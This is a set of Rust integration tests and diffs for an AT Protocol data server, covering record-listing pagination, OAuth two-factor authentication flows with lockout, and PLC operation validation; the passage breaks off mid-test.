assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
let records = body["records"].as_array().unwrap();
let rkeys: Vec<&str> = records
.iter()
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
.collect();
assert_eq!(rkeys, vec!["aaaa", "bbbb", "cccc"], "reverse=true should give ASC order (oldest first)");
}
#[tokio::test]
async fn test_list_records_cursor_pagination() {
let client = client();
let (did, jwt) = setup_new_user("list-cursor").await;
for i in 0..5 {
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
tokio::time::sleep(Duration::from_millis(50)).await;
}
let res = client
.get(format!(
"{}/xrpc/com.atproto.repo.listRecords",
base_url().await
))
.query(&[
("repo", did.as_str()),
("collection", "app.bsky.feed.post"),
("limit", "2"),
])
.send()
.await
.expect("Failed to list records");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
let records = body["records"].as_array().unwrap();
assert_eq!(records.len(), 2);
let cursor = body["cursor"].as_str().expect("Should have cursor with more records");
let res2 = client
.get(format!(
"{}/xrpc/com.atproto.repo.listRecords",
base_url().await
))
.query(&[
("repo", did.as_str()),
("collection", "app.bsky.feed.post"),
("limit", "2"),
("cursor", cursor),
])
.send()
.await
.expect("Failed to list records with cursor");
assert_eq!(res2.status(), StatusCode::OK);
let body2: Value = res2.json().await.unwrap();
let records2 = body2["records"].as_array().unwrap();
assert_eq!(records2.len(), 2);
let all_uris: Vec<&str> = records
.iter()
.chain(records2.iter())
.map(|r| r["uri"].as_str().unwrap())
.collect();
let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect();
assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records");
}
#[tokio::test]
async fn test_list_records_rkey_start() {
let client = client();
let (did, jwt) = setup_new_user("list-rkey-start").await;
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await;
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await;
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await;
create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.repo.listRecords",
base_url().await
))
.query(&[
("repo", did.as_str()),
("collection", "app.bsky.feed.post"),
("rkeyStart", "bbbb"),
("reverse", "true"),
])
.send()
.await
.expect("Failed to list records");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
let records = body["records"].as_array().unwrap();
let rkeys: Vec<&str> = records
.iter()
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
.collect();
for rkey in &rkeys {
assert!(*rkey >= "bbbb", "rkeyStart should filter records >= start");
}
}
#[tokio::test]
async fn test_list_records_rkey_end() {
let client = client();
let (did, jwt) = setup_new_user("list-rkey-end").await;
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await;
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await;
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await;
create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.repo.listRecords",
base_url().await
))
.query(&[
("repo", did.as_str()),
("collection", "app.bsky.feed.post"),
("rkeyEnd", "cccc"),
("reverse", "true"),
])
.send()
.await
.expect("Failed to list records");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
let records = body["records"].as_array().unwrap();
let rkeys: Vec<&str> = records
.iter()
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
.collect();
for rkey in &rkeys {
assert!(*rkey <= "cccc", "rkeyEnd should filter records <= end");
}
}
#[tokio::test]
async fn test_list_records_rkey_range() {
let client = client();
let (did, jwt) = setup_new_user("list-rkey-range").await;
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await;
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await;
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await;
create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await;
create_post_with_rkey(&client, &did, &jwt, "eeee", "Fifth").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.repo.listRecords",
base_url().await
))
.query(&[
("repo", did.as_str()),
("collection", "app.bsky.feed.post"),
("rkeyStart", "bbbb"),
("rkeyEnd", "dddd"),
("reverse", "true"),
])
.send()
.await
.expect("Failed to list records");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
let records = body["records"].as_array().unwrap();
let rkeys: Vec<&str> = records
.iter()
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
.collect();
for rkey in &rkeys {
assert!(*rkey >= "bbbb" && *rkey <= "dddd", "Range should be inclusive, got {}", rkey);
}
assert!(!rkeys.is_empty(), "Should have at least some records in range");
}
#[tokio::test]
async fn test_list_records_limit_clamping_max() {
let client = client();
let (did, jwt) = setup_new_user("list-limit-max").await;
for i in 0..5 {
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
}
let res = client
.get(format!(
"{}/xrpc/com.atproto.repo.listRecords",
base_url().await
))
.query(&[
("repo", did.as_str()),
("collection", "app.bsky.feed.post"),
("limit", "1000"),
])
.send()
.await
.expect("Failed to list records");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
let records = body["records"].as_array().unwrap();
assert!(records.len() <= 100, "Limit should be clamped to max 100");
}
#[tokio::test]
async fn test_list_records_limit_clamping_min() {
let client = client();
let (did, jwt) = setup_new_user("list-limit-min").await;
create_post_with_rkey(&client, &did, &jwt, "aaaa", "Post").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.repo.listRecords",
base_url().await
))
.query(&[
("repo", did.as_str()),
("collection", "app.bsky.feed.post"),
("limit", "0"),
])
.send()
.await
.expect("Failed to list records");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
let records = body["records"].as_array().unwrap();
assert!(records.len() >= 1, "Limit should be clamped to min 1");
}
#[tokio::test]
async fn test_list_records_empty_collection() {
let client = client();
let (did, _jwt) = setup_new_user("list-empty").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.repo.listRecords",
base_url().await
))
.query(&[
("repo", did.as_str()),
("collection", "app.bsky.feed.post"),
])
.send()
.await
.expect("Failed to list records");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
let records = body["records"].as_array().unwrap();
assert!(records.is_empty(), "Empty collection should return empty array");
assert!(body["cursor"].is_null(), "Empty collection should have no cursor");
}
#[tokio::test]
async fn test_list_records_exact_limit() {
let client = client();
let (did, jwt) = setup_new_user("list-exact-limit").await;
for i in 0..10 {
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
}
let res = client
.get(format!(
"{}/xrpc/com.atproto.repo.listRecords",
base_url().await
))
.query(&[
("repo", did.as_str()),
("collection", "app.bsky.feed.post"),
("limit", "5"),
])
.send()
.await
.expect("Failed to list records");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
let records = body["records"].as_array().unwrap();
assert_eq!(records.len(), 5, "Should return exactly 5 records when limit=5");
}
#[tokio::test]
async fn test_list_records_cursor_exhaustion() {
let client = client();
let (did, jwt) = setup_new_user("list-cursor-exhaust").await;
for i in 0..3 {
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
}
let res = client
.get(format!(
"{}/xrpc/com.atproto.repo.listRecords",
base_url().await
))
.query(&[
("repo", did.as_str()),
("collection", "app.bsky.feed.post"),
("limit", "10"),
])
.send()
.await
.expect("Failed to list records");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
let records = body["records"].as_array().unwrap();
assert_eq!(records.len(), 3);
}
#[tokio::test]
async fn test_list_records_repo_not_found() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.repo.listRecords",
base_url().await
))
.query(&[
("repo", "did:plc:nonexistent12345"),
("collection", "app.bsky.feed.post"),
])
.send()
.await
.expect("Failed to list records");
assert_eq!(res.status(), StatusCode::NOT_FOUND);
}
#[tokio::test]
async fn test_list_records_includes_cid() {
let client = client();
let (did, jwt) = setup_new_user("list-includes-cid").await;
create_post_with_rkey(&client, &did, &jwt, "test", "Test post").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.repo.listRecords",
base_url().await
))
.query(&[
("repo", did.as_str()),
("collection", "app.bsky.feed.post"),
])
.send()
.await
.expect("Failed to list records");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
let records = body["records"].as_array().unwrap();
for record in records {
assert!(record["uri"].is_string(), "Record should have uri");
assert!(record["cid"].is_string(), "Record should have cid");
assert!(record["value"].is_object(), "Record should have value");
let cid = record["cid"].as_str().unwrap();
assert!(cid.starts_with("bafy"), "CID should be valid");
}
}
#[tokio::test]
async fn test_list_records_cursor_with_reverse() {
let client = client();
let (did, jwt) = setup_new_user("list-cursor-reverse").await;
for i in 0..5 {
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
}
let res = client
.get(format!(
"{}/xrpc/com.atproto.repo.listRecords",
base_url().await
))
.query(&[
("repo", did.as_str()),
("collection", "app.bsky.feed.post"),
("limit", "2"),
("reverse", "true"),
])
.send()
.await
.expect("Failed to list records");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
let records = body["records"].as_array().unwrap();
let first_rkeys: Vec<&str> = records
.iter()
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
.collect();
assert_eq!(first_rkeys, vec!["post00", "post01"], "First page with reverse should start from oldest");
if let Some(cursor) = body["cursor"].as_str() {
let res2 = client
.get(format!(
"{}/xrpc/com.atproto.repo.listRecords",
base_url().await
))
.query(&[
("repo", did.as_str()),
("collection", "app.bsky.feed.post"),
("limit", "2"),
("reverse", "true"),
("cursor", cursor),
])
.send()
.await
.expect("Failed to list records with cursor");
let body2: Value = res2.json().await.unwrap();
let records2 = body2["records"].as_array().unwrap();
let second_rkeys: Vec<&str> = records2
.iter()
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
.collect();
assert_eq!(second_rkeys, vec!["post02", "post03"], "Second page should continue in ASC order");
}
}

View File

@@ -323,6 +323,7 @@ async fn test_authorize_get_with_valid_request_uri() {
let auth_res = client
.get(format!("{}/oauth/authorize", url))
.header("Accept", "application/json")
.query(&[("request_uri", request_uri)])
.send()
.await
@@ -344,6 +345,7 @@ async fn test_authorize_rejects_invalid_request_uri() {
let res = client
.get(format!("{}/oauth/authorize", url))
.header("Accept", "application/json")
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:nonexistent")])
.send()
.await
@@ -941,6 +943,7 @@ async fn test_wrong_credentials_denied() {
let auth_res = http_client
.post(format!("{}/oauth/authorize", url))
.header("Accept", "application/json")
.form(&[
("request_uri", request_uri),
("username", &handle),
@@ -1162,6 +1165,7 @@ async fn test_deactivated_account_cannot_authorize() {
let auth_res = http_client
.post(format!("{}/oauth/authorize", url))
.header("Accept", "application/json")
.form(&[
("request_uri", request_uri),
("username", &handle),
@@ -1184,6 +1188,7 @@ async fn test_expired_authorization_request() {
let res = http_client
.get(format!("{}/oauth/authorize", url))
.header("Accept", "application/json")
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:expired-or-nonexistent")])
.send()
.await
@@ -1477,3 +1482,631 @@ async fn test_state_with_special_chars() {
location
);
}
#[tokio::test]
async fn test_2fa_required_when_enabled() {
let url = base_url().await;
let http_client = client();
let ts = Utc::now().timestamp_millis();
let handle = format!("2fa-required-{}", ts);
let email = format!("2fa-required-{}@example.com", ts);
let password = "2fa-test-password";
let create_res = http_client
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
.json(&json!({
"handle": handle,
"email": email,
"password": password
}))
.send()
.await
.unwrap();
assert_eq!(create_res.status(), StatusCode::OK);
let account: Value = create_res.json().await.unwrap();
let user_did = account["did"].as_str().unwrap();
let db_url = common::get_db_connection_string().await;
let pool = sqlx::postgres::PgPoolOptions::new()
.max_connections(1)
.connect(&db_url)
.await
.expect("Failed to connect to database");
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
.bind(user_did)
.execute(&pool)
.await
.expect("Failed to enable 2FA");
let redirect_uri = "https://example.com/2fa-callback";
let mock_client = setup_mock_client_metadata(redirect_uri).await;
let client_id = mock_client.uri();
let (_, code_challenge) = generate_pkce();
let par_body: Value = http_client
.post(format!("{}/oauth/par", url))
.form(&[
("response_type", "code"),
("client_id", &client_id),
("redirect_uri", redirect_uri),
("code_challenge", &code_challenge),
("code_challenge_method", "S256"),
])
.send()
.await
.unwrap()
.json()
.await
.unwrap();
let request_uri = par_body["request_uri"].as_str().unwrap();
let auth_client = no_redirect_client();
let auth_res = auth_client
.post(format!("{}/oauth/authorize", url))
.form(&[
("request_uri", request_uri),
("username", &handle),
("password", password),
("remember_device", "false"),
])
.send()
.await
.unwrap();
assert!(
auth_res.status().is_redirection(),
"Should redirect to 2FA page, got status: {}",
auth_res.status()
);
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
assert!(
location.contains("/oauth/authorize/2fa"),
"Should redirect to 2FA page, got: {}",
location
);
assert!(
location.contains("request_uri="),
"2FA redirect should include request_uri"
);
}
#[tokio::test]
async fn test_2fa_invalid_code_rejected() {
let url = base_url().await;
let http_client = client();
let ts = Utc::now().timestamp_millis();
let handle = format!("2fa-invalid-{}", ts);
let email = format!("2fa-invalid-{}@example.com", ts);
let password = "2fa-test-password";
let create_res = http_client
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
.json(&json!({
"handle": handle,
"email": email,
"password": password
}))
.send()
.await
.unwrap();
assert_eq!(create_res.status(), StatusCode::OK);
let account: Value = create_res.json().await.unwrap();
let user_did = account["did"].as_str().unwrap();
let db_url = common::get_db_connection_string().await;
let pool = sqlx::postgres::PgPoolOptions::new()
.max_connections(1)
.connect(&db_url)
.await
.expect("Failed to connect to database");
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
.bind(user_did)
.execute(&pool)
.await
.expect("Failed to enable 2FA");
let redirect_uri = "https://example.com/2fa-invalid-callback";
let mock_client = setup_mock_client_metadata(redirect_uri).await;
let client_id = mock_client.uri();
let (_, code_challenge) = generate_pkce();
let par_body: Value = http_client
.post(format!("{}/oauth/par", url))
.form(&[
("response_type", "code"),
("client_id", &client_id),
("redirect_uri", redirect_uri),
("code_challenge", &code_challenge),
("code_challenge_method", "S256"),
])
.send()
.await
.unwrap()
.json()
.await
.unwrap();
let request_uri = par_body["request_uri"].as_str().unwrap();
let auth_client = no_redirect_client();
let auth_res = auth_client
.post(format!("{}/oauth/authorize", url))
.form(&[
("request_uri", request_uri),
("username", &handle),
("password", password),
("remember_device", "false"),
])
.send()
.await
.unwrap();
assert!(auth_res.status().is_redirection());
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
assert!(location.contains("/oauth/authorize/2fa"));
let twofa_res = http_client
.post(format!("{}/oauth/authorize/2fa", url))
.form(&[
("request_uri", request_uri),
("code", "000000"),
])
.send()
.await
.unwrap();
assert_eq!(twofa_res.status(), StatusCode::OK);
let body = twofa_res.text().await.unwrap();
assert!(
body.contains("Invalid verification code") || body.contains("invalid"),
"Should show error for invalid code"
);
}
#[tokio::test]
async fn test_2fa_valid_code_completes_auth() {
let url = base_url().await;
let http_client = client();
let ts = Utc::now().timestamp_millis();
let handle = format!("2fa-valid-{}", ts);
let email = format!("2fa-valid-{}@example.com", ts);
let password = "2fa-test-password";
let create_res = http_client
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
.json(&json!({
"handle": handle,
"email": email,
"password": password
}))
.send()
.await
.unwrap();
assert_eq!(create_res.status(), StatusCode::OK);
let account: Value = create_res.json().await.unwrap();
let user_did = account["did"].as_str().unwrap();
let db_url = common::get_db_connection_string().await;
let pool = sqlx::postgres::PgPoolOptions::new()
.max_connections(1)
.connect(&db_url)
.await
.expect("Failed to connect to database");
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
.bind(user_did)
.execute(&pool)
.await
.expect("Failed to enable 2FA");
let redirect_uri = "https://example.com/2fa-valid-callback";
let mock_client = setup_mock_client_metadata(redirect_uri).await;
let client_id = mock_client.uri();
let (code_verifier, code_challenge) = generate_pkce();
let par_body: Value = http_client
.post(format!("{}/oauth/par", url))
.form(&[
("response_type", "code"),
("client_id", &client_id),
("redirect_uri", redirect_uri),
("code_challenge", &code_challenge),
("code_challenge_method", "S256"),
])
.send()
.await
.unwrap()
.json()
.await
.unwrap();
let request_uri = par_body["request_uri"].as_str().unwrap();
let auth_client = no_redirect_client();
let auth_res = auth_client
.post(format!("{}/oauth/authorize", url))
.form(&[
("request_uri", request_uri),
("username", &handle),
("password", password),
("remember_device", "false"),
])
.send()
.await
.unwrap();
assert!(auth_res.status().is_redirection());
let twofa_code: String = sqlx::query_scalar(
"SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1"
)
.bind(request_uri)
.fetch_one(&pool)
.await
.expect("Failed to get 2FA code from database");
let twofa_res = auth_client
.post(format!("{}/oauth/authorize/2fa", url))
.form(&[
("request_uri", request_uri),
("code", &twofa_code),
])
.send()
.await
.unwrap();
assert!(
twofa_res.status().is_redirection(),
"Valid 2FA code should redirect to success, got status: {}",
twofa_res.status()
);
let location = twofa_res.headers().get("location").unwrap().to_str().unwrap();
assert!(
location.starts_with(redirect_uri),
"Should redirect to client callback, got: {}",
location
);
assert!(
location.contains("code="),
"Redirect should include authorization code"
);
let auth_code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
let token_res = http_client
.post(format!("{}/oauth/token", url))
.form(&[
("grant_type", "authorization_code"),
("code", auth_code),
("redirect_uri", redirect_uri),
("code_verifier", &code_verifier),
("client_id", &client_id),
])
.send()
.await
.unwrap();
assert_eq!(token_res.status(), StatusCode::OK, "Token exchange should succeed");
let token_body: Value = token_res.json().await.unwrap();
assert!(token_body["access_token"].is_string());
assert_eq!(token_body["sub"], user_did);
}
#[tokio::test]
async fn test_2fa_lockout_after_max_attempts() {
let url = base_url().await;
let http_client = client();
let ts = Utc::now().timestamp_millis();
let handle = format!("2fa-lockout-{}", ts);
let email = format!("2fa-lockout-{}@example.com", ts);
let password = "2fa-test-password";
let create_res = http_client
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
.json(&json!({
"handle": handle,
"email": email,
"password": password
}))
.send()
.await
.unwrap();
assert_eq!(create_res.status(), StatusCode::OK);
let account: Value = create_res.json().await.unwrap();
let user_did = account["did"].as_str().unwrap();
let db_url = common::get_db_connection_string().await;
let pool = sqlx::postgres::PgPoolOptions::new()
.max_connections(1)
.connect(&db_url)
.await
.expect("Failed to connect to database");
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
.bind(user_did)
.execute(&pool)
.await
.expect("Failed to enable 2FA");
let redirect_uri = "https://example.com/2fa-lockout-callback";
let mock_client = setup_mock_client_metadata(redirect_uri).await;
let client_id = mock_client.uri();
let (_, code_challenge) = generate_pkce();
let par_body: Value = http_client
.post(format!("{}/oauth/par", url))
.form(&[
("response_type", "code"),
("client_id", &client_id),
("redirect_uri", redirect_uri),
("code_challenge", &code_challenge),
("code_challenge_method", "S256"),
])
.send()
.await
.unwrap()
.json()
.await
.unwrap();
let request_uri = par_body["request_uri"].as_str().unwrap();
let auth_client = no_redirect_client();
let auth_res = auth_client
.post(format!("{}/oauth/authorize", url))
.form(&[
("request_uri", request_uri),
("username", &handle),
("password", password),
("remember_device", "false"),
])
.send()
.await
.unwrap();
assert!(auth_res.status().is_redirection());
for i in 0..5 {
let res = http_client
.post(format!("{}/oauth/authorize/2fa", url))
.form(&[
("request_uri", request_uri),
("code", "999999"),
])
.send()
.await
.unwrap();
if i < 4 {
assert_eq!(res.status(), StatusCode::OK, "Attempt {} should show error page", i + 1);
let body = res.text().await.unwrap();
assert!(
body.contains("Invalid verification code"),
"Should show invalid code error on attempt {}", i + 1
);
}
}
let lockout_res = http_client
.post(format!("{}/oauth/authorize/2fa", url))
.form(&[
("request_uri", request_uri),
("code", "999999"),
])
.send()
.await
.unwrap();
assert_eq!(lockout_res.status(), StatusCode::OK);
let body = lockout_res.text().await.unwrap();
assert!(
body.contains("Too many failed attempts") || body.contains("No 2FA challenge found"),
"Should be locked out after max attempts. Body: {}",
&body[..body.len().min(500)]
);
}
#[tokio::test]
async fn test_account_selector_with_2fa_requires_verification() {
let url = base_url().await;
let http_client = client();
let ts = Utc::now().timestamp_millis();
let handle = format!("selector-2fa-{}", ts);
let email = format!("selector-2fa-{}@example.com", ts);
let password = "selector-2fa-password";
let create_res = http_client
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
.json(&json!({
"handle": handle,
"email": email,
"password": password
}))
.send()
.await
.unwrap();
assert_eq!(create_res.status(), StatusCode::OK);
let account: Value = create_res.json().await.unwrap();
let user_did = account["did"].as_str().unwrap().to_string();
let redirect_uri = "https://example.com/selector-2fa-callback";
let mock_client = setup_mock_client_metadata(redirect_uri).await;
let client_id = mock_client.uri();
let (code_verifier, code_challenge) = generate_pkce();
let par_body: Value = http_client
.post(format!("{}/oauth/par", url))
.form(&[
("response_type", "code"),
("client_id", &client_id),
("redirect_uri", redirect_uri),
("code_challenge", &code_challenge),
("code_challenge_method", "S256"),
])
.send()
.await
.unwrap()
.json()
.await
.unwrap();
let request_uri = par_body["request_uri"].as_str().unwrap();
let auth_client = no_redirect_client();
let auth_res = auth_client
.post(format!("{}/oauth/authorize", url))
.form(&[
("request_uri", request_uri),
("username", &handle),
("password", password),
("remember_device", "true"),
])
.send()
.await
.unwrap();
assert!(auth_res.status().is_redirection());
let device_cookie = auth_res.headers()
.get("set-cookie")
.and_then(|v| v.to_str().ok())
.map(|s| s.split(';').next().unwrap_or("").to_string())
.expect("Should have received device cookie");
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
assert!(location.contains("code="), "First auth should succeed");
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
let _token_body: Value = http_client
.post(format!("{}/oauth/token", url))
.form(&[
("grant_type", "authorization_code"),
("code", code),
("redirect_uri", redirect_uri),
("code_verifier", &code_verifier),
("client_id", &client_id),
])
.send()
.await
.unwrap()
.json()
.await
.unwrap();
let db_url = common::get_db_connection_string().await;
let pool = sqlx::postgres::PgPoolOptions::new()
.max_connections(1)
.connect(&db_url)
.await
.expect("Failed to connect to database");
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
.bind(&user_did)
.execute(&pool)
.await
.expect("Failed to enable 2FA");
let (code_verifier2, code_challenge2) = generate_pkce();
let par_body2: Value = http_client
.post(format!("{}/oauth/par", url))
.form(&[
("response_type", "code"),
("client_id", &client_id),
("redirect_uri", redirect_uri),
("code_challenge", &code_challenge2),
("code_challenge_method", "S256"),
])
.send()
.await
.unwrap()
.json()
.await
.unwrap();
let request_uri2 = par_body2["request_uri"].as_str().unwrap();
let select_res = auth_client
.post(format!("{}/oauth/authorize/select", url))
.header("cookie", &device_cookie)
.form(&[
("request_uri", request_uri2),
("did", &user_did),
])
.send()
.await
.unwrap();
assert!(
select_res.status().is_redirection(),
"Account selector should redirect, got status: {}",
select_res.status()
);
let select_location = select_res.headers().get("location").unwrap().to_str().unwrap();
assert!(
select_location.contains("/oauth/authorize/2fa"),
"Account selector with 2FA enabled should redirect to 2FA page, got: {}",
select_location
);
let twofa_code: String = sqlx::query_scalar(
"SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1"
)
.bind(request_uri2)
.fetch_one(&pool)
.await
.expect("Failed to get 2FA code");
let twofa_res = auth_client
.post(format!("{}/oauth/authorize/2fa", url))
.header("cookie", &device_cookie)
.form(&[
("request_uri", request_uri2),
("code", &twofa_code),
])
.send()
.await
.unwrap();
assert!(twofa_res.status().is_redirection());
let final_location = twofa_res.headers().get("location").unwrap().to_str().unwrap();
assert!(
final_location.starts_with(redirect_uri) && final_location.contains("code="),
"After 2FA, should redirect to client with code, got: {}",
final_location
);
let final_code = final_location.split("code=").nth(1).unwrap().split('&').next().unwrap();
let token_res = http_client
.post(format!("{}/oauth/token", url))
.form(&[
("grant_type", "authorization_code"),
("code", final_code),
("redirect_uri", redirect_uri),
("code_verifier", &code_verifier2),
("client_id", &client_id),
])
.send()
.await
.unwrap();
assert_eq!(token_res.status(), StatusCode::OK);
let final_token: Value = token_res.json().await.unwrap();
assert_eq!(final_token["sub"], user_did, "Token should be for the correct user");
}

View File

@@ -735,6 +735,7 @@ async fn test_security_deactivated_account_blocked() {
let auth_res = http_client
.post(format!("{}/oauth/authorize", url))
.header("Accept", "application/json")
.form(&[
("request_uri", request_uri),
("username", &handle),

View File

@@ -255,6 +255,7 @@ async fn test_full_plc_operation_flow() {
}
#[tokio::test]
#[ignore = "requires exclusive env var access; run with: cargo test test_sign_plc_operation_consumes_token -- --ignored --test-threads=1"]
async fn test_sign_plc_operation_consumes_token() {
let client = client();
let (token, did) = create_account_and_login(&client).await;
@@ -902,6 +903,7 @@ async fn test_migration_rejects_wrong_did_document() {
}
#[tokio::test]
#[ignore = "requires exclusive env var access; run with: cargo test test_full_migration_flow_end_to_end -- --ignored --test-threads=1"]
async fn test_full_migration_flow_end_to_end() {
let client = client();
let (token, did) = create_account_and_login(&client).await;

513
tests/plc_validation.rs Normal file
View File

@@ -0,0 +1,513 @@
use bspds::plc::{
PlcError, PlcOperation, PlcService, PlcValidationContext,
cid_for_cbor, sign_operation, signing_key_to_did_key,
validate_plc_operation, validate_plc_operation_for_submission,
verify_operation_signature,
};
use k256::ecdsa::SigningKey;
use serde_json::json;
use std::collections::HashMap;
fn create_valid_operation() -> serde_json::Value {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let op = json!({
"type": "plc_operation",
"rotationKeys": [did_key.clone()],
"verificationMethods": {
"atproto": did_key.clone()
},
"alsoKnownAs": ["at://test.handle"],
"services": {
"atproto_pds": {
"type": "AtprotoPersonalDataServer",
"endpoint": "https://pds.example.com"
}
},
"prev": null
});
sign_operation(&op, &key).unwrap()
}
#[test]
fn test_validate_plc_operation_valid() {
let op = create_valid_operation();
let result = validate_plc_operation(&op);
assert!(result.is_ok());
}
#[test]
fn test_validate_plc_operation_missing_type() {
let op = json!({
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"sig": "test"
});
let result = validate_plc_operation(&op);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")));
}
#[test]
fn test_validate_plc_operation_invalid_type() {
let op = json!({
"type": "invalid_type",
"sig": "test"
});
let result = validate_plc_operation(&op);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")));
}
#[test]
fn test_validate_plc_operation_missing_sig() {
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {}
});
let result = validate_plc_operation(&op);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")));
}
#[test]
fn test_validate_plc_operation_missing_rotation_keys() {
let op = json!({
"type": "plc_operation",
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"sig": "test"
});
let result = validate_plc_operation(&op);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")));
}
#[test]
fn test_validate_plc_operation_missing_verification_methods() {
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"alsoKnownAs": [],
"services": {},
"sig": "test"
});
let result = validate_plc_operation(&op);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")));
}
#[test]
fn test_validate_plc_operation_missing_also_known_as() {
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"services": {},
"sig": "test"
});
let result = validate_plc_operation(&op);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")));
}
#[test]
fn test_validate_plc_operation_missing_services() {
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"sig": "test"
});
let result = validate_plc_operation(&op);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("services")));
}
#[test]
fn test_validate_rotation_key_required() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let server_key = "did:key:zServer123";
let op = json!({
"type": "plc_operation",
"rotationKeys": [did_key.clone()],
"verificationMethods": {"atproto": did_key.clone()},
"alsoKnownAs": ["at://test.handle"],
"services": {
"atproto_pds": {
"type": "AtprotoPersonalDataServer",
"endpoint": "https://pds.example.com"
}
},
"sig": "test"
});
let ctx = PlcValidationContext {
server_rotation_key: server_key.to_string(),
expected_signing_key: did_key.clone(),
expected_handle: "test.handle".to_string(),
expected_pds_endpoint: "https://pds.example.com".to_string(),
};
let result = validate_plc_operation_for_submission(&op, &ctx);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")));
}
#[test]
fn test_validate_signing_key_match() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let wrong_key = "did:key:zWrongKey456";
let op = json!({
"type": "plc_operation",
"rotationKeys": [did_key.clone()],
"verificationMethods": {"atproto": wrong_key},
"alsoKnownAs": ["at://test.handle"],
"services": {
"atproto_pds": {
"type": "AtprotoPersonalDataServer",
"endpoint": "https://pds.example.com"
}
},
"sig": "test"
});
let ctx = PlcValidationContext {
server_rotation_key: did_key.clone(),
expected_signing_key: did_key.clone(),
expected_handle: "test.handle".to_string(),
